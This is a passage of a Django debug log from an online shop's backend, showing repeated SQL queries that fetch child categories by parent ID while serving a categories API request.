"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:15:18,231 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:15:18,233 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:15:18,237 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:15:18,239 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:15:18,241 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:15:18,243 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:15:18,246 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:15:18,250 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:15:18,253 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:15:18,255 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:15:18,257 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:15:18,259 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:15:18,262 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:15:18,265 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:15:18,267 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:15:18,269 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:15:18,271 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:15:18,275 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:15:18,277 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:15:18,279 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:15:18,282 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:15:18,284 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:15:18,286 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:15:18,289 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:15:18,292 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:15:18,294 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:15:18,296 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:15:18,298 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:15:18,302 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:15:18,304 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:15:18,306 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:15:18,308 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:15:18,311 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:15:18,318 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:15:18,320 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:15:18,323 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:15:18,326 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:15:18,328 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:15:18,330 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:15:18,333 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:15:18,336 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:15:18,338 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:15:18,341 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:15:18,343 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:15:18] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:15:20,203 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:15:20,210 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:15:20,213 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:15:20,216 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:15:20,220 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:15:20,223 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:15:20,226 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:15:20,230 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:15:20,233 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:15:20,237 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:15:20,241 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:15:20,244 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:15:20,247 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:15:20,251 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:15:20,257 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:15:20,261 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:15:20,264 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:15:20,268 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:15:20,272 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:15:20,278 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:15:20,282 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:15:20,286 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:15:20,290 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 